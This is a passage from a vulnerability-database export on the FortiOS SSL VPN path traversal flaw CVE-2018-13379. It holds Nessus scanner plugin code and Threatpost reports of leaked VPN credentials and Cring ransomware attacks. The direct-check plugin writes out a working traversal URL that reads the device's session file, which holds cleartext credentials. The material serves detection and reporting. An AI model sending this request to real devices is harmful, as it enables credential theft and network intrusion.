2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macos_forticlient_detect.nbin\");\n script_require_keys(\"installed_sw/FortiClient (macOS)\", \"Host/MacOSX/Version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\nexit(0, 'This plugin has been deprecated. Use fortios_FG-IR-18-384.nasl (plugin ID 125885) instead.');\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T15:25:55", "description": "The remote host is running a version of FortiOS 5.6.3 prior to 5.6.8 or 6.0.x prior to 6.0.5. It is, therefore, affected by a directory traversal vulnerability in the SSL VPN web portal, due to improper sanitization of path traversal characters in URLs. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to download arbitrary FortiOS system files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-06T00:00:00", "type": "nessus", "title": "Fortinet FortiOS SSL VPN Directory Traversal Vulnerability (FG-IR-18-384) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:fortinet:fortios"], "id": "FORTIOS_FG-IR-18-384_DIRECT.NASL", "href": "https://www.tenable.com/plugins/nessus/128552", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128552);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-13379\");\n script_bugtraq_id(108693);\n script_xref(name:\"IAVA\", value:\"0001-A-0002-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0020\");\n\n script_name(english:\"Fortinet FortiOS SSL VPN Directory Traversal Vulnerability (FG-IR-18-384) (Direct Check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a directory traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of FortiOS 5.6.3 prior to 5.6.8 or 6.0.x prior to 6.0.5. It is, therefore,\naffected by a directory traversal vulnerability in the SSL VPN web portal, due to improper sanitization of path \ntraversal characters in URLs. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP \nrequest, to download arbitrary FortiOS system files.\");\n # https://fortiguard.com/psirt/FG-IR-18-384\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa8b8063\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Fortinet FortiOS version to 5.6.8, 6.0.5, 6.2.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-13379\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Fortinet FortiGate SSL VPN File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fortinet:fortios\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('http.inc');\ninclude('spad_log_func.inc');\n\nport = get_http_port(default:443);\nurl = '/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession';\n\nresponse = http_send_recv3(\n method:'GET',\n item:url,\n port:port,\n exit_on_fail:TRUE\n);\n\nspad_log(message:'Request: \\n' + http_last_sent_request() + '\\n');\nspad_log(message:'Response: \\n' + join(response) + '\\n');\n\nif ('200 OK' >!< response[0] || response[2] !~ 'var fgt_lang =') audit(AUDIT_HOST_NOT, 'affected');\n\nreport =\n '\\nNessus was able exploit this issue using the following URL :\\n' +\n '\\n' + build_url(port:port, qs:url) + '\\n' +\n '\\nThe string representation of the response from the target host was: ' + '\\n' + obj_rep(response[2]) + '\\n'; \nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T15:17:34", "description": "The remote host is running a version of FortiOS 5.4.6 prior or equal to 5.4.12, 5.6.3 prior to 5.6.8 or 6.0.x prior to 6.0.5. It is, therefore, affected by a directory traversal vulnerability in the SSL VPN web portal, due to an improper limitation of a pathname to a restricted Directory. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to download arbitrary FortiOS system files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-14T00:00:00", "type": "nessus", "title": "Fortinet FortiOS 5.4.6 <= 5.4.12 / 5.6.3 < 5.6.8 / 6.0.x < 6.0.5 SSL VPN Directory Traversal (FG-IR-18-384)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:fortinet:fortios"], "id": "FORTIOS_FG-IR-18-384.NASL", "href": "https://www.tenable.com/plugins/nessus/125885", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125885);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-13379\");\n script_bugtraq_id(108693);\n script_xref(name:\"IAVA\", value:\"0001-A-0002-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0020\");\n\n script_name(english:\"Fortinet FortiOS 5.4.6 <= 5.4.12 / 5.6.3 < 5.6.8 / 6.0.x < 6.0.5 SSL VPN Directory Traversal (FG-IR-18-384)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a directory traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of FortiOS 5.4.6 prior or equal to 5.4.12, 5.6.3 prior to 5.6.8 or 6.0.x prior to\n6.0.5. It is, therefore, affected by a directory traversal vulnerability in the SSL VPN web portal, due to an improper\nlimitation of a pathname to a restricted Directory. An unauthenticated, remote attacker can exploit this, via a\nspecially crafted HTTP request, to download arbitrary FortiOS system files.\");\n # https://fortiguard.com/psirt/FG-IR-18-384\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa8b8063\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Fortinet FortiOS version to 5.6.8, 6.0.5, 6.2.0 or later. Alternatively, apply one of the workarounds\noutlined in the linked advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-13379\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Fortinet FortiGate SSL VPN File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/14\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fortinet:fortios\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"fortinet_version.nbin\");\n script_require_keys(\"Host/Fortigate/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('vcf.inc');\ninclude('vcf_extras_fortios.inc');\n\napp_info = vcf::get_app_info(app:'FortiOS', kb_ver:'Host/Fortigate/version');\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvcf::fortios::verify_product_and_model(product_name:'FortiGate');\n\nconstraints = [\n { 'min_version' : '5.4.6', 'max_version' : '5.4.12', 'fixed_display' : '5.6.8, 6.0.5, 6.2.0 or later' },\n { 'min_version' : '5.6.3', 'fixed_version' : '5.6.8' },\n { 'min_version' : '6.0.0', 'fixed_version' : '6.0.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2021-09-10T13:33:05", "description": "Credentials pilfered from 87,000 unpatched Fortinet SSL-VPNs have been posted online, the company has [confirmed](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>).\n\nOr then again, maybe the number is far greater. On Wednesday, [BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/>) reported that it\u2019s been in touch with a threat actor who leaked a list of nearly half a million Fortinet VPN credentials, allegedly scraped from exploitable devices last summer.\n\nThe news outlet has analyzed the file and reported that it contains VPN credentials for 498,908 users over 12,856 devices. BleepingComputer didn\u2019t test the credentials but said that all of the IP addresses check out as Fortinet VPN servers.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAccording to analysis done by [Advanced Intel](<https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings>), the IP addresses are for devices worldwide. As the chart below shows, there are 22,500 victimized entities located in 74 countries, with 2,959 of them being located in the US.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09180501/distribution-e1631225115765.jpg>)\n\nThe geographical distribution of the Fortinet VPN SSL list. Source: Advanced Intel.\n\nUPDATE: Threatpost reached out to Fortinet for clarification on how many devices were compromised. A spokesperson\u2019s reply reiterated the statement put out on Wednesday:\n\n\u201cThe security of our customers is our first priority. Fortinet is aware that a malicious actor has disclosed on a dark web forum, SSL-VPN credentials to access FortiGate SSL-VPN devices. The credentials were obtained from systems that have not yet implemented the patch update provided in May 2019. Since May 2019, Fortinet has continuously communicated with customers urging the implementation of mitigations, including corporate blog posts in [August 2019](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_business-2Dand-2Dtechnology_fortios-2Dssl-2Dvulnerability&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=LGgVh3l8kre7r4f1ssl1_Kz9MXkRjaAznfUi1BMjzpc&e=>), [July 2020](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_business-2Dand-2Dtechnology_atp-2D29-2Dtargets-2Dssl-2Dvpn-2Dflaws&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=F9W4tauf4zFHFuZbvTYHmF2Y2b_tHI0htVTpiF6kRwM&e=>), [April 2021](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_psirt-2Dblogs_patch-2Dvulnerability-2Dmanagement&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=m_k7PDQ0L4L0_OvdKQgGF5LkRVde6Q9EjgVXWtyg7sY&e=>) and [June 2021](<https://www.fortinet.com/blog/psirt-blogs/prioritizing-patching-is-essential-for-network-integrity>) For more information, please refer to our latest [blog](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) and [PSIRT](<https://www.fortiguard.com/psirt/FG-IR-18-384>) advisory. We strongly urge customers to implement both the patch upgrade and password reset as soon as possible.\u201d\n\n## A Creaky Old Bug Was Exploited\n\nOn Wednesday, the company confirmed that the attackers exploited [FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) / [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>): a path traversal weakness in Fortinet\u2019s FortiOS that was discovered in 2018 and which has been [repeatedly](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>), [persistently](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) [exploited](<https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/>) [since](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) then.\n\nUsing the leaked VPN credentials, attackers can perform data exfiltration, install malware and launch ransomware attacks.\n\nThe bug, which recently made it to the Cybersecurity and Infrastructure Security Agency\u2019s (CISA\u2019s) list of the [top 30 most-exploited flaws](<https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/>), lets an unauthenticated attacker use specially crafted HTTP resource requests in order to download system files under the SSL VPN web portal.\n\n[Fortinet fixed the glitch](<https://www.fortiguard.com/psirt/FG-IR-18-384>) in a May 2019 update (and has since then repeatedly urged customers to upgrade their devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above). But even if security teams patched their VPNs, if they didn\u2019t also reset the devices\u2019 passwords at the same time, the VPNs still might be vulnerable.\n\n## All in the Babuk Family\n\nAccording to BleepingComputer, a threat actor known as Orange \u2013 the administrator of the newly launched RAMP hacking forum and a previous operator of the Babuk ransomware operation \u2013 was behind the leak of Fortinet credentials.\n\nOrange, who reportedly split off from Babuk after gang members quarreled, is believed to now be in with the new Groove ransomware operation. On Tuesday, Orange created a post on the RAMP forum with a link to a file that allegedly contained thousands of Fortinet VPN accounts.\n\nAt the same time, a post promoting the Fortinet leak appeared on Groove\u2019s data leak site.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09181910/Screen-Shot-2021-09-09-at-6.18.51-PM-e1631225999483.png>)\n\nGroove is a new ransomware gang that\u2019s been active just since last month. It favors the [double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) model of combining data compromise with threats to publish seized data.\n\nAccording to a Wednesday[ post](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates>) co-authored by researchers from Intel471 and McAfee Enterprise Advanced Threat Research (ATR), with contributions from Coveware, McAfee Enterprise ATR said that it believes with high confidence that Groove is associated with the Babuk gang, either as a former affiliate or subgroup.\n\n## Chatting Up the Ransomware \u2018Artist\u2019\n\nOn Tuesday, one of the Groove gang\u2019s members decided to chat up [Advanced Intel researchers](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATURfcd4v3FHxX6gbihrPKiOsKVZWKogo5F6F12wmaozsXKHpRn-2BuwOKhxsw08i8Jv-2FwvO5fMxaC-2Fte96Z6WZovyPDvgaoAv118tKwZ5rO8iwUDyyIWPDHnMoXBJtaLTD2RabFZrrydZEg6RqJoehkdLk-3DUm1f_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTfxpBYaCF7SSTgcHUKKV76UPqxTA0p35WcvHO-2B-2FRJuzuH54khmPYQLlkSfPjUHNAEXmgG-2BAfkNgcNKoVR9B9stOpafLCBk3qkXifeCsD9qirBA0nFvpW7EKJZBqmyDuRJPZiat-2B-2BXYCIJyRqjlbli1cMzNiEtsWjfRjsB82fJ-2BuXkMJGLitr0yTHVhHoV-2B7vgARde73QCuABoV-2Fk8lDDaGpEQVoKiwlCAiZTq63zy5kUQ-3D>), to give them an insider\u2019s take on how the new ransomware syndicate was formed and how it recruits operators. That included \u201cthe \u2018truth\u2019 about the association of Babuk, [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) and [BlackMatter](<https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/>), and other insights on the inner relationships within the ransomware community,\u201d as researchers Yelisey Boguslavskiy and Anastasia Sentsova explained.\n\nAccording to their writeup, the Groove representative is likely a threat actor that goes by \u201cSongBird\u201d. The researchers described SongBird as a known character, being a former Babuk ransomware operator and creator of the RAMP forum \u2013 which was launched on July 11 and which caters to top ransomware operators plotting their attacks.\n\nThe screen capture below shows Advanced Intel\u2019s translation of SongBird\u2019s explanation of the platform: \u201cRAMP is the result of my year-long work of manipulation by top journalists and media such as Bloomberg and others. I spent quite some time to promote this domain and I am very proud for all of the work I did! I declare this forum is a work of art!\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09183430/kitten-brag-e1631226887669.jpg>)\n\nAccording to Advanced Intel, RAMP was initially based on the former Babuk\u2019s data leak website domain but has since relocated to a new domain.\n\nSongBird was reportedly prompted to pull off their tell-all after the [disclosure of Babuk\u2019s source code](<https://threatpost.com/babuk-ransomware-builder-virustotal/167481/>). The source code was uploaded to VirusTotal in July, making it available to all security vendors and competitors. At the time, it wasn\u2019t clear how it happened, though Advanced Intel said on Wednesday that the code release was done by an actor using the alias DY-2.\n\nThe code release had repercussions, Advanced Intel said. \u201cThe incident caused a massive backlash from the underground community which once again provoked the release of the blog by SongBird,\u201d according to the report.\n\nSongBird told the researchers that the actor wanted to address \u201cthe issue of constant misinformation and misreporting originating from the Twitter community covering the ransomware subject.\u201d\n\nThe actor denied any associations between DarkSide and BlackMatter, with the exception of both ransomware strains sharing the same source code: a circumstance that means the code \u201cmost likely has been purchased from one of the DarkSide affiliates,\u201d SongBird wrote.\n\n## How to Protect Your VPN\n\nYou can check Fortinet\u2019s advisory for a list of versions affected by the oft-exploited vulnerability that was at the heart of this credential scraping. Fortinet had the following recommendations for organizations that may have been running an affected version \u201cat any time\u201d:\n\n 1. Disable all VPNs (SSL-VPN or IPSEC) until the following remediation steps have been taken.\n 2. Immediately upgrade affected devices to the latest available release, as detailed below.\n 3. Treat all credentials as potentially compromised by performing an organization-wide password reset.\n 4. Implement multi-factor authentication, which will help mitigate the abuse of any compromised credentials, both now and in the future.\n 5. Notify users to explain the reason for the password reset and monitor services such as HIBP for your domain. There is the potential that if passwords have been reused for other accounts, they could be used in credential stuffing attacks.\n\nRajiv Pimplaskar, Veridium chief revenue officer, told Threatpost that the breach is \u201ca stark reminder of today\u2019s dangers with password-based systems. While enterprises and users are starting to adopt passwordless authentication methods like \u2018phone as a token\u2019 and FIDO2 for customer and Single Sign On (SSO) portals and enterprise applications, vulnerabilities still exist across entire categories of cases such as, 3rd party sites, VPN (Virtual Private Network) and VDI (Virtual Desktop Infrastructure) environments, all of which are particularly vulnerable in the current WFH explosion.\n\n\u201cCompanies need to adopt a more holistic modern authentication strategy that is identity provider agnostic and can operate across all use cases in order to build true resiliency and ensure cyber defense against such actors,\u201d he concluded.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on September 22 at 2 PM EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T22:49:27", "type": "threatpost", "title": "Thousands of Fortinet VPN Account Credentials Leaked", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T22:49:27", "id": "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "href": "https://threatpost.com/thousands-of-fortinet-vpn-account-credentials-leaked/169348/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-04-08T21:27:05", "description": "Threat actors are exploiting a Fortinet vulnerability flagged by the feds last week that delivers a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.\n\nResearchers say the attackers are exploiting an unpatched path-reversal flaw, tracked as [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>), in Fortinet\u2019s FortiOS. The goal is to gain access to victims enterprise networks and ultimately deliver ransomware, according to a [report by Kaspersky researchers published](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) this week.\n\n\u201cIn at least in one case, an attack of the ransomware resulted in a temporary shutdown of the industrial process due to servers used to control the industrial process becoming encrypted,\u201d Kaspersky senior security researcher Vyacheslav Kopeytsev wrote in the report. \n[](<https://threatpost.com/newsletter-sign/>)\n\nCring is relatively new to the ransomware threat landscape\u2014which already includes dominant strains [REvil](<https://threatpost.com/revil-claims-ransomware-attacks/164739/>), [Ryuk](<https://threatpost.com/ransomware-attack-spain-employment-agency/164703/>), [Maze and](<https://threatpost.com/maze-ransomware-cognizant/154957/>) [Conti](<https://threatpost.com/conti-40m-ransom-florida-school/165258/>). Cring was first [observed and reported](<https://id-ransomware.blogspot.com/2021/01/cring-ransomware.html>) by the researcher who goes by Amigo_A and Swisscom\u2019s CSIRT team in January. The ransomware is unique in that it uses two forms of encryption and destroys backup files in an effort to antagonize victims and prevent them from retrieving backup files without paying the ransom.\n\nLast week, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) that nation-state advanced persistent threat (APT) groups were actively exploiting known security vulnerabilities in the Fortinet FortiOS operating system, affecting the company\u2019s SSL VPN products.\n\nOne of those bugs, is CVE-2018-13379, a path-traversal flaw in Fortinet FortiOS. The vulnerability is tied to system\u2019s SSL VPN web portal and allows an unauthenticated attacker to download system files of targeted systems via a specially crafted HTTP resource requests.\n\nIn its report Kaspersky echoed the feds\u2019 warning adding attackers are first scanning connections to Fortinet VPNs to see if the software used on the device is the vulnerable version. In the campaign researchers observed, threat actors follow an exploit chain, exploiting CVE-2018-13379 to launch a directory-traversal attack. The goal is to crack open affected hardware, give adversaries access to network credentials and to establish foothold in the targeted network, Kopeytsev explained.\n\n\u201cA directory-traversal attack allows an attacker to access system files on the Fortigate SSL VPN appliance,\u201d he wrote. \u201cSpecifically, an unauthenticated attacker can connect to the appliance through the internet and remotely access the file \u2018sslvpn_websession,\u2019 which contains the username and password stored in cleartext.\u201d\n\nFor it\u2019s part, \u201cthe security of our customers is our first priority,\u201d according to a statement from Fortinet provided to Threatpost. \u201cFor example, CVE-2018-13379 is an old vulnerability resolved in May 2019. Fortinet immediately issued a _[PSIRT advisory](<https://fortiguard.com/psirt/FG-IR-18-384> \"https://fortiguard.com/psirt/fg-ir-18-384\" )_ and communicated directly with customers and via corporate blog posts on multiple occasions in _[August 2019](<https://www.fortinet.com/blog/business-and-technology/fortios-ssl-vulnerability> \"https://www.fortinet.com/blog/business-and-technology/fortios-ssl-vulnerability\" )_ and _[July 2020 ](<https://www.fortinet.com/blog/business-and-technology/atp-29-targets-ssl-vpn-flaws> \"https://www.fortinet.com/blog/business-and-technology/atp-29-targets-ssl-vpn-flaws\" )_strongly recommending an upgrade. Upon resolution we have consistently communicated with customers as recently as late as 2020. If customers have not done so, we urge them to immediately implement the upgrade and mitigations.\u201d\n\n## **Anatomy of an Attack**\n\nOnce gaining access to the first system on the enterprise network, attackers use the Mimikatz utility to steal the account credentials of Windows users who had previously logged in to the compromised system, according to Kaspersky.\n\nIn this way, attackers compromised the domain administrator account, and then used [commodity tools](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>) like Cobalt Stroke backdoor and Powershell to propagate attacks across various systems on the network, according to the report.\n\nAfter gaining complete control, attackers download a cmd script to launch Cring ransomware, naming the malicious execution script \u201cKaspersky\u201d to disguise it as a security solution, Kopeytsev said.\n\nThe report breaks down how Cring achieves encryption and destroys existing backup files once it\u2019s launched on a system. First, the ransomware stops various services of two key programs on the network\u2014Veritas NetBackup and Microsoft SQL server.\n\nCring also halts the SstpSvc service, which is used to create VPN connections, which researchers surmised was to block any remediation effort by system administrators, Kopeytsev said.\n\n\u201cIt 